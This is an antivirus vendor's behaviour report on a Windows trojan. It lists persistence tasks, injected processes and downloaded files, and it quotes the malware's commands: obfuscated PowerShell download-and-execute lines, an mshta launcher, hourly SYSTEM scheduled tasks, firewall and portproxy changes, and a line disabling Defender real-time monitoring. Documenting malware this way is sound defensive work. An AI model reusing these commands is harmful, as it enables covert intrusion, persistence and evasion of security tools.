Trojan.Inject3.12791

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\blackball
<SYSTEM32>\tasks\esrvouewm9
<SYSTEM32>\tasks\uze0fml\aikjgicel
<SYSTEM32>\tasks\microsoft\windows\omtuibwd\wc7lnk4z
<SYSTEM32>\tasks\t.zer9g.com
<SYSTEM32>\tasks\amaod4p
<SYSTEM32>\tasks\grbvlkbwf\pxch2fwd7

Malicious functions

Executes the following

'<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block

Downloads

http://t.###+nx.com/7p.php?0.##################################################################

Injects code into

the following system processes:

<SYSTEM32>\rundll32.exe

Modifies file system

Creates the following files

%WINDIR%\temp\if.bin
%WINDIR%\temp\m6.bin
%WINDIR%\temp\m6.bin.exe.ori

Network activity

TCP

HTTP GET requests

http://t.##ynx.com/7p.php?0.############################
http://t.##ynx.com/usb.jsp?ln########################
http://t.##ynx.com/a.jsp?us#################################################################################
http://t.##ynx.com/report.jsp?jd#################################################################################################################################################################...
http://d.##kng.com/if.bin?jd################################################################
http://d.##kng.com/m6.bin?jd################################################################

UDP

DNS ASK t.##ynx.com
DNS ASK t.##3r0.com
DNS ASK t.##r9g.com
DNS ASK d.##kng.com

Miscellaneous

Searches for the following windows

ClassName: 'MS_AutodialMonitor' WindowName: ''
ClassName: 'MS_WebCheckMonitor' WindowName: ''

Creates and executes the following

'<SYSTEM32>\cmd.exe' /c powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.###'+'nx.com/7p.php?0.######################################################################## ('http://t.###'...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\k3n8b02f.cmdline"' (with hidden window)

Executes the following

'<SYSTEM32>\rundll32.exe'
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn GrbvlKBwf\PxcH2FWd7 /F /tr "powershell -c PS_CMD"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...
'<SYSTEM32>\schtasks.exe' /run /tn \AmaOd4P
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \AmaOd4P /F /tr "powershell -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.zer9g.com /F /tr t.zer9g.com
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "try{$localMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalMn',[ref]$localMn)}catch{};$ifmd5='5b2849ff2e8c335dcc60fd2155b2d4d3';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.#####.com...
'<SYSTEM32>\cmd.exe' /c powershell -c "try{$localMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalMn',[ref]$localMn)}catch{};$ifmd5='5b2849ff2e8c335dcc60fd2155b2d4d3';$ifp=$env:tmp+'\m6.bin';$down_url='http...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='def23ff364e25f64342f39d3f64d5aeb';$ifp=$env:tmp+'\if.bin';$down_url='http://d.#####.com...
'<SYSTEM32>\cmd.exe' /c powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='def23ff364e25f64342f39d3f64d5aeb';$ifp=$env:tmp+'\if.bin';$down_url='http...
'<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
'<SYSTEM32>\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa /F
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa1 /F
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa2 /F
'<SYSTEM32>\schtasks.exe' /run /tn MicroSoft\Windows\omTuIBwd\wC7Lnk4Z
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\omTuIBwd\wC7Lnk4Z /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /run /tn UZe0FMl\AiKJgICeL
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn UZe0FMl\AiKJgICeL /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...
'<SYSTEM32>\schtasks.exe' /run /tn \eSrVOUEWM9
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \eSrVOUEWM9 /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
'<SYSTEM32>\cmd.exe' /c echo Set-MpPreference -DisableRealtimeMonitoring 1
'<SYSTEM32>\cmd.exe' /c powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.###'+'nx.com/7p.php?0.######################################################################## ('http://t.###'...
'<SYSTEM32>\mshta.exe' vbscript:createobject("wscript.shell").run("cmd /c powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.###'+'nx.com/7p.php?0.########################################...
'<SYSTEM32>\schtasks.exe' /run /tn GrbvlKBwf\PxcH2FWd7
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\k3n8b02f.cmdline"

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта

Скачать с Google Play

Скачайте
Dr.Web для Android

Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через
AppGallery/Google Pay

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней